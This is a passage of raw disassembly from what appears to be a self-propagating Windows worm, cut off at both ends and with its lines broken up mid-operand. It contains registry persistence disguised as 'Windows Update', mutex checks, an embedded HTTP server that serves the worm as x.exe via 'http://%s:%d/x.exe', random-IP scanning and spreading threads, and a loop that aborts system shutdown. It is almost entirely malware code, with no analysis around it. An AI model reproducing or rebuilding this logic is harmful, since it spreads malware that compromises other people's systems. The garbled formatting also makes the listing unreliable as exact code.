+ 0Ch + arg_4 ]
xor esi, esi
test edi, edi
jle short
loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4
+ 26
call dword_310010F8 ;
rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl,
61h
mov [ esi
+ ebx ], dl
inc esi
cmp esi, edi
jl short
loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4
+ F
and byte ptr [ ebx
+ edi ], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
sub_31001A04 proc near ; CODE XREF: sub_310026A6
+ 105
var_54 = dword ptr
- 54h
var_24 = word ptr
- 24h
var_10 = dword ptr
- 10h
var_C = dword ptr
- 0Ch
arg_0 = dword ptr 8
arg_4 = word ptr
0Ch
push ebp
mov ebp, esp
sub esp,
54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ ebp
+ var_54 ]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ ebp
+ arg_4 ]
add esp,
0Ch
mov [ ebp
+ var_24 ], ax
lea eax, [ ebp
+ var_10 ]
push eax
lea eax, [ ebp
+ var_54 ]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ ebp
+ var_54 ], edi
push [ ebp
+ arg_0 ]
push esi
call dword_310010B0 ;
CreateProcessA
push [ ebp
+ var_C ]
mov esi, dword_31001098
mov edi, eax
call esi ;
dword_31001098
push [ ebp
+ var_10 ]
call esi ;
dword_31001098
mov eax, edi
pop edi
pop esi
leave
retn
sub_31001A04 endp
sub_31001A5A proc near ; CODE XREF: sub_3100202D
+ 3E
; sub_310020F4
+ 7 ...
var_34 = byte ptr
- 34h
push ebp
mov ebp, esp
sub esp,
34h
lea eax, [ ebp
+ var_34 ]
push 31h
push eax
call dword_3100114C ;
gethostname
cmp eax,
0FFFFFFFFh
jnz short
loc_31001A7B
call dword_31001150 ;
WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31001A7B: ; CODE XREF: sub_31001A5A
+ 15
lea eax, [ ebp
+ var_34 ]
push eax
call dword_31001154 ;
gethostbyname
test eax, eax
jnz short
loc_31001A90
mov eax,
100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31001A90: ; CODE XREF: sub_31001A5A
+ 2D
mov eax, [ eax
+ 0Ch ]
mov eax, [ eax ]
mov eax, [ eax ]
leave
retn
sub_31001A5A endp
sub_31001A99 proc near ; CODE XREF: sub_31001F41
+ 22
; sub_31001FA5
+ 27 ...
var_4 = byte ptr
- 4
push ecx
lea eax, [ esp
+ 4
+ var_4 ]
push 0
push eax
call dword_31001134 ;
InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31001A99 endp
sub_31001AAF proc near ; CODE XREF: sub_31001E06
+ 40
; sub_31001E06
+ 4C ...
arg_0 = dword ptr 4
push [ esp
+ arg_0 ]
push 0
push 2
call dword_310010B8 ;
OpenEventA
test eax, eax
jz short
locret_31001AC8
push eax
call dword_310010B4 ;
SetEvent
locret_31001AC8: ; CODE XREF: sub_31001AAF
+ 10
retn
sub_31001AAF endp
sub_31001AC9 proc near ; CODE XREF: UPX0:31002B69
push esi
mov esi, dword_310010F8
push edi
call esi ;
dword_310010F8
mov edi, eax
shl edi,
10h
call esi ;
dword_310010F8
or eax, edi
pop edi
pop esi
retn
sub_31001AC9 endp
sub_31001ADF proc near ; DATA XREF: sub_31001C18
+ 127
var_200 = byte ptr
- 200h
var_100 = byte ptr
- 100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp,
200h
push ebx
mov ebx, [ ebp
+ arg_0 ]
push esi
push edi
xor edi, edi
lea eax, [ ebp
+ var_100 ]
push edi
push 100h
push eax
push ebx
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jnz short
loc_31001B10
push 1
jmp loc_31001BCB
; ---------------------------------------------------------------------------
loc_31001B10: ; CODE XREF: sub_31001ADF
+ 28
mov esi, dword_310010F4
lea eax, [ ebp
+ var_100 ]
push offset aGet ; \"GET\"
push eax
call esi ;
dword_310010F4
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
lea eax, [ ebp
+ var_100 ]
push offset a_exe ; \".exe\"
push eax
call esi ;
dword_310010F4
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
mov esi, dword_31001168
push 0
push 3Dh
push offset aHttp1_1
200OkCo ; \"HTTP/1.1
200 OK\r\nContent
- Type: applicat\"...
push ebx
call esi ;
dword_31001168
push dword_31004FC0
lea eax, [ ebp
+ var_200 ]
push offset aContentLengthU ; \"Content
- Length: %u\r\n\r\n\"
push eax
call dword_3100111C ;
wsprintfA
add esp,
0Ch
lea eax, [ ebp
+ var_200 ]
push 0
push eax
call sub_31002B92 ; strlen
pop ecx
push eax
lea eax, [ ebp
+ var_200 ]
push eax
push ebx
call esi ;
dword_31001168
loc_31001B8D: ; CODE XREF: sub_31001ADF
+ E8
mov eax, dword_31004FC0
mov ecx,
1000h
sub eax, edi
cmp eax, ecx
jb short
loc_31001B9F
mov eax, ecx
loc_31001B9F: ; CODE XREF: sub_31001ADF
+ BC
test eax, eax
jz short
loc_31001BEC
push 0
push eax
mov eax, dword_31004FB8
add eax, edi
push eax
push ebx
call esi ;
dword_31001168
cmp eax,
0FFFFFFFFh
jz short
loc_31001BC9
cmp eax,
1000h
jb short
loc_31001BEC
push 64h
add edi, eax
call dword_31001080 ;
Sleep
jmp short
loc_31001B8D
; ---------------------------------------------------------------------------
loc_31001BC9: ; CODE XREF: sub_31001ADF
+ D5
push 2
loc_31001BCB: ; CODE XREF: sub_31001ADF
+ 2C
pop eax
jmp short
loc_31001C11
; ---------------------------------------------------------------------------
loc_31001BCE: ; CODE XREF: sub_31001ADF
+ 49
; sub_31001ADF
+ 61
mov esi, dword_31001168
push 0
push 15h
push offset aHttp1_1
200Ok ; \"HTTP/1.1
200 OK\r\n\r\n\r\n\"
push ebx
call esi ;
dword_31001168
push 0
push 3
push offset dword_31004A80
push ebx
call esi ;
dword_31001168
loc_31001BEC: ; CODE XREF: sub_31001ADF
+ C2
; sub_31001ADF
+ DC
push 7D0h
call dword_31001080 ;
Sleep
push 2
push ebx
call dword_31001170 ;
shutdown
push ebx
call dword_31001174 ;
closesocket
push 0
call dword_310010BC ;
ExitThread
xor eax, eax
loc_31001C11: ; CODE XREF: sub_31001ADF
+ ED
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001ADF endp
sub_31001C18 proc near ; DATA XREF: sub_31001E06
+ DE
var_130 = byte ptr
- 130h
var_28 = byte ptr
- 28h
var_18 = word ptr
- 18h
var_16 = word ptr
- 16h
var_14 = dword ptr
- 14h
var_8 = dword ptr
- 8
var_4 = dword ptr
- 4
push ebp
mov ebp, esp
sub esp,
130h
push ebx
push edi
call sub_3100195C
lea eax, [ ebp
+ var_130 ]
push 104h
push eax
push offset aWindowsUpdate ; \"Windows Update\"
xor ebx, ebx
push offset aSoftwareMicros ; \"SOFTWARE\\Microsoft\\Windows\\CurrentVersi\"...
push 80000002h
mov dword_31004FBC, ebx
call sub_31002264
add esp,
14h
test eax, eax
jnz loc_31001D4D
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ ebp
+ var_130 ]
push 80000000h
push eax
call dword_310010C8 ;
CreateFileA
mov esi, eax
cmp esi,
0FFFFFFFFh
jnz short
loc_31001C84
push 1
call dword_310010BC ;
ExitThread
loc_31001C84: ; CODE XREF: sub_31001C18
+ 62
push ebx
push esi
call dword_310010C4 ;
GetFileSize
push eax
mov dword_31004FC0, eax
call sub_31002680
pop ecx
mov dword_31004FB8, eax
lea ecx, [ ebp
+ var_4 ]
push ebx
push ecx
push dword_31004FC0
push eax
push esi
call dword_310010C0 ;
ReadFile
mov eax, [ ebp
+ var_4 ]
push esi
mov dword_31004FC0, eax
call dword_31001098 ;
CloseHandle
push ebx
push 1
push 2
call dword_31001158 ;
socket
push 10h
mov edi, eax
pop esi
lea eax, [ ebp
+ var_18 ]
push esi
push ebx
push eax
call sub_31002B8C ; memset
add esp,
0Ch
mov [ ebp
+ var_18 ], 2
mov [ ebp
+ var_14 ], ebx
loc_31001CE6: ; CODE XREF: sub_31001C18
+ E5
; sub_31001C18
+ ED ...
call dword_310010F8 ;
rand
add eax,
7D0h
and eax,
1FFFh
cmp al, bl
mov dword_31004FCC, eax
jz short
loc_31001CE6
xor ecx, ecx
mov cl, ah
test cl, cl
jz short
loc_31001CE6
push eax
call dword_31001160 ;
ntohs
mov [ ebp
+ var_16 ], ax
lea eax, [ ebp
+ var_18 ]
push esi
push eax
push edi
call dword_31001140 ;
bind
test eax, eax
jnz short
loc_31001CE6
push 64h
push edi
call dword_31001144 ;
listen
mov [ ebp
+ var_8 ], esi
pop esi
loc_31001D2F: ; CODE XREF: sub_31001C18
+ 133
lea eax, [ ebp
+ var_8 ]
push eax
lea eax, [ ebp
+ var_28 ]
push eax
push edi
call dword_31001148 ;
accept
push eax
push offset sub_31001ADF
call sub_310019B3
pop ecx
pop ecx
jmp short
loc_31001D2F
; ---------------------------------------------------------------------------
loc_31001D4D: ; CODE XREF: sub_31001C18
+ 3D
push ebx
call dword_310010BC ;
ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31001C18 endp
sub_31001D5C proc near ; CODE XREF: sub_31001E06:loc_31001EDE
var_190 = byte ptr
- 190h
push ebp
mov ebp, esp
sub esp,
190h
lea eax, [ ebp
+ var_190 ]
push esi
mov esi, dword_3100113C
push eax
push 2
call esi ;
dword_3100113C
lea eax, [ ebp
+ var_190 ]
push eax
push 102h
call esi ;
dword_3100113C
pop esi
leave
retn
sub_31001D5C endp
; ---------------------------------------------------------------------------
loc_31001D88: ; CODE XREF: UPX1:31006C28
push 0
call dword_310010A0 ; GetModuleHandleA
push offset aFtpupd_exe ; \"ftpupd.exe\"
mov dword_31004FD0, eax
call dword_310010D4 ; DeleteFileA
call sub_3100195C
push offset aUterm13 ; \"uterm13\"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
call dword_310010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31001DCA
push 1
call dword_310010CC ; ExitProcess
loc_31001DCA: ; CODE XREF: UPX0:31001DC0
call sub_310017C9
call sub_310023C8
call sub_31002542
push offset sub_31001E06
call sub_31001851
test eax, eax
pop ecx
jz short loc_31001DEF
push 0
call sub_31001E06
loc_31001DEF: ; CODE XREF: UPX0:31001DE6
xor eax, eax
retn
sub_31001DF2 proc near ; CODE XREF: sub_31001E06:loc_31001F07
; sub_31001F41:loc_31001F5A ...
push 0
push dword_31004FC8
call dword_310010D8 ;
WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31001DF2 endp
sub_31001E06 proc near ; CODE XREF: UPX0:31001DEA
; DATA XREF: UPX0:31001DD9
var_10 = dword ptr
- 10h
var_C = dword ptr
- 0Ch
var_4 = dword ptr
- 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31001180
push offset loc_31002BD0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13x ; \"u13x\"
xor edi, edi
push edi
push 1
push edi
call dword_310010DC ;
CreateEventA
mov dword_31004FC8, eax
mov [ ebp
+ var_4 ], edi
push offset aU10x ; \"u10x\"
call sub_31001AAF
mov [ esp
+ 0Ch + var_C ],
offset aU11x ; \"u11x\"
call sub_31001AAF
mov [ esp
+ 0Ch + var_C ],
offset aU12x ; \"u12x\"
call sub_31001AAF
mov [ esp
+ 0Ch + var_C ],
offset aU8 ; \"u8\"
call sub_3100198A
mov [ esp
+ 0Ch + var_C ],
offset aU9 ; \"u9\"
call sub_3100198A
mov [ esp
+ 0Ch + var_C ],
offset aU10 ; \"u10\"
call sub_3100198A
mov [ esp
+ 0Ch + var_C ],
offset aU11 ; \"u11\"
call sub_3100198A
mov [ esp
+ 0Ch + var_C ],
offset aU12 ; \"u12\"
call sub_3100198A
pop ecx
cmp [ ebp
+ arg_0 ], edi
jz short
loc_31001EDE
push offset aWs2_32 ; \"ws2_32\"
mov esi, dword_31001090
call esi ;
dword_31001090
push offset aWininet ; \"wininet\"
call esi ;
dword_31001090
push offset aMsvcrt ; \"msvcrt\"
call esi ;
dword_31001090
push offset aAdvapi32 ; \"advapi32\"
call esi ;
dword_31001090
push offset aUser32 ; \"user32\"
call esi ;
dword_31001090
push offset aUterm13 ; \"uterm13\"
call sub_3100198A
pop ecx
mov dword_31004FC4, eax
loc_31001EDE: ; CODE XREF: sub_31001E06
+ 9D
call sub_31001D5C
push edi
push offset sub_31001C18
call sub_31001999
push edi
push offset loc_31002B40
call sub_31001999
push edi
push offset loc_31002150
call sub_31001999
add esp,
18h
loc_31001F07: ; CODE XREF: sub_31001E06
+ 11C
call sub_31001DF2
test eax, eax
jnz short
loc_31001F24
push edi
call dword_31001018 ;
AbortSystemShutdownA
push 1388h
call dword_31001080 ;
Sleep
jmp short
loc_31001F07
; ---------------------------------------------------------------------------
loc_31001F24: ; CODE XREF: sub_31001E06
+ 108
or [ ebp
+ var_4 ],
0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ ebp
+ var_10 ]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001E06 endp
; [ 00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD \" + \" TO EXPAND ]
sub_31001F41 proc near ; DATA XREF: sub_31001FA5
+ 55
; sub_3100202D
+ 6A ...
var_1 = byte ptr
- 1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ ebp
+ arg_0 ],
7Fh
jnz short
loc_31001F50
push 1
pop eax
jmp short
locret_31001FA1
; ---------------------------------------------------------------------------
loc_31001F50: ; CODE XREF: sub_31001F41
+ 8
mov al, byte ptr [ ebp
+ arg_0 + 3 ]
push ebx
push esi
mov [ ebp
+ var_1 ], al
xor bl, bl
loc_31001F5A: ; CODE XREF: sub_31001F41
+ 5A
call sub_31001DF2
test eax, eax
jnz short
loc_31001F9D
call sub_31001A99
test eax, eax
jz short
loc_31001F9D
cmp [ ebp
+ var_1 ], bl
jz short
loc_31001F96
mov byte ptr [ ebp
+ arg_0 + 3 ], bl
push [ ebp
+ arg_0 ]
call sub_31001262
movzx esi, word_31004FDC
pop ecx
call dword_310010F8 ;
rand
cdq
idiv esi
add edx, esi
push edx
call dword_31001080 ;
Sleep
loc_31001F96: ; CODE XREF: sub_31001F41
+ 2E
inc bl
cmp bl,
0FFh
jb short
loc_31001F5A
loc_31001F9D: ; CODE XREF: sub_31001F41
+ 20
; sub_31001F41
+ 29
pop esi
xor eax, eax
pop ebx
locret_31001FA1: ; CODE XREF: sub_31001F41
+ D
leave
retn 4
sub_31001F41 endp
sub_31001FA5 proc near ; DATA XREF: sub_3100202D
+ 7E
; UPX0:310021E5
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ ebp
+ arg_0 ],
7Fh
jnz short
loc_31001FB3
push 1
pop eax
jmp short
loc_31002029
; ---------------------------------------------------------------------------
loc_31001FB3: ; CODE XREF: sub_31001FA5
+ 7
push ebx
push esi
push edi
call sub_3100195C
mov esi, dword_310010F8
xor ebx, ebx
loc_31001FC3: ; CODE XREF: sub_31001FA5
+ 7D
call sub_31001DF2
test eax, eax
jnz short
loc_31002024
call sub_31001A99
test eax, eax
jz short
loc_31002024
call esi ;
dword_310010F8
mov byte ptr [ ebp
+ arg_0 + 2 ], al
call esi ;
dword_310010F8
push offset dword_31004FD4
mov byte ptr [ ebp
+ arg_0 + 3 ], al
call dword_310010E0 ;
InterlockedIncrement
push [ ebp
+ arg_0 ]
call sub_31001262
test eax, eax
pop ecx
jnz short
loc_31002006
push [ ebp
+ arg_0 ]
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_31002006: ; CODE XREF: sub_31001FA5
+ 50
movzx edi, word_31004FDC
call esi ;
dword_310010F8
cdq
idiv edi
add edx, edi
push edx
call dword_31001080 ;
Sleep
inc ebx
cmp ebx,
8000h
jl short
loc_31001FC3
loc_31002024: ; CODE XREF: sub_31001FA5
+ 25
; sub_31001FA5
+ 2E
pop edi
pop esi
xor eax, eax
pop ebx
loc_31002029: ; CODE XREF: sub_31001FA5
+ C
pop ebp
retn 4
sub_31001FA5 endp
sub_3100202D proc near ; DATA XREF: UPX0:310021FD
var_8 = dword ptr
- 8
var_4 = dword ptr
- 4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_3100195C
call sub_31001DF2
test eax, eax
jnz loc_310020E6
push ebx
mov ebx, dword_31001080
push esi
mov esi, dword_310010F8
push edi
loc_31002053: ; CODE XREF: sub_3100202D
+ 48
; sub_3100202D
+ B0
call esi ;
dword_310010F8
mov byte ptr [ ebp
+ var_4 + 1 ], al
call esi ;
dword_310010F8
mov byte ptr [ ebp
+ var_4 + 3 ], al
call esi ;
dword_310010F8
mov byte ptr [ ebp
+ var_4 + 2 ], al
loc_31002062: ; CODE XREF: sub_3100202D
+ 3C
call esi ;
dword_310010F8
cmp al,
7Fh
mov byte ptr [ ebp
+ var_4 ], al
jz short
loc_31002062
call sub_31001A5A
mov edi, [ ebp
+ var_4 ]
cmp edi, eax
jz short
loc_31002053
call sub_31001A99
test eax, eax
jz short
loc_310020BE
push offset dword_31004FD4
call dword_310010E0 ;
InterlockedIncrement
push edi
call sub_31001262
test eax, eax
pop ecx
jnz short
loc_310020C5
push edi
push offset sub_31001F41
call sub_310019B3
pop ecx
mov [ ebp
+ var_8 ], 4
pop ecx
loc_310020AA: ; CODE XREF: sub_3100202D
+ 8D
push edi
push offset sub_31001FA5
call sub_310019B3
dec [ ebp
+ var_8 ]
pop ecx
pop ecx
jnz short
loc_310020AA
jmp short
loc_310020C5
; ---------------------------------------------------------------------------
loc_310020BE: ; CODE XREF: sub_3100202D
+ 51
push 2710h
call ebx ;
dword_31001080
loc_310020C5: ; CODE XREF: sub_3100202D
+ 67
; sub_3100202D
+ 8F
movzx edi, word_31004FDC
call esi ;
dword_310010F8
cdq
idiv edi
add edx, edi
push edx
call ebx ;
dword_31001080
call sub_31001DF2
test eax, eax
jz loc_31002053
pop edi
pop esi
pop ebx
loc_310020E6: ; CODE XREF: sub_3100202D
+ 11
push 0
call dword_310010BC ;
ExitThread
xor eax, eax
leave
retn 4
sub_3100202D endp
sub_310020F4 proc near ; CODE XREF: UPX0:310021C2
; UPX0:loc_31002228
var_50 = byte ptr
- 50h
var_28 = byte ptr
- 28h
push ebp
mov ebp, esp
sub esp,
50h
push esi
call sub_31001A5A
push eax
call dword_3100115C ;
inet_ntoa
mov esi, dword_31001078
push eax
lea eax, [ ebp
+ var_28 ]
push eax
call esi ;
dword_31001078
push dword_31004FCC
lea eax, [ ebp
+ var_28 ]
push eax
lea eax, [ ebp
+ var_50 ]
push offset aHttpSDX_exe ; \"http://%s:%d/x.exe\"
push eax
call dword_3100111C ;
wsprintfA
add esp,
10h
lea eax, [ ebp
+ var_50 ]
push eax
push offset word_31004002
call esi ;
dword_31001078
push offset byte_31004000
call dword_3100107C ;
lstrlenA
mov byte_31004000[ eax ],
0DFh
pop esi
leave
retn
sub_310020F4 endp
; ---------------------------------------------------------------------------
loc_31002150: ; DATA XREF: sub_31001E06 + F4
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31004FD4, ebx
call sub_31001A99
mov esi, dword_31001080
mov edi, 1388h
test eax, eax
jnz short loc_3100217E
loc_31002172: ; CODE XREF: UPX0:3100217C
push edi
call esi ; dword_31001080
call sub_31001A99
test eax, eax
jz short loc_31002172
loc_3100217E: ; CODE XREF: UPX0:31002170
lea eax, [ esp + 14h ]
push ebx
push eax
call dword_31001134 ; InternetGetConnectedState
test byte ptr [ esp + 14h ], 2
push 50h
mov dword_31004FD8, ebx
pop ebp
mov word_31004FDC, 96h
jz short loc_310021BB
mov dword_31004FD8, 1
mov ebp, 15Eh
mov word_31004FDC, 14h
loc_310021BB: ; CODE XREF: UPX0:310021A1
call sub_31001A5A
mov ebx, eax
call sub_310020F4
cmp ebx, 100007Fh
jz short loc_310021DC
push ebx
push offset sub_31001F41
call sub_310019B3
pop ecx
pop ecx
loc_310021DC: ; CODE XREF: UPX0:310021CD
mov dword ptr [ esp + 10h ], 4
loc_310021E4: ; CODE XREF: UPX0:310021F5
push ebx
push offset sub_31001FA5
call sub_310019B3
dec dword ptr [ esp + 18h ]
pop ecx
pop ecx
jnz short loc_310021E4
test ebp, ebp
jle short <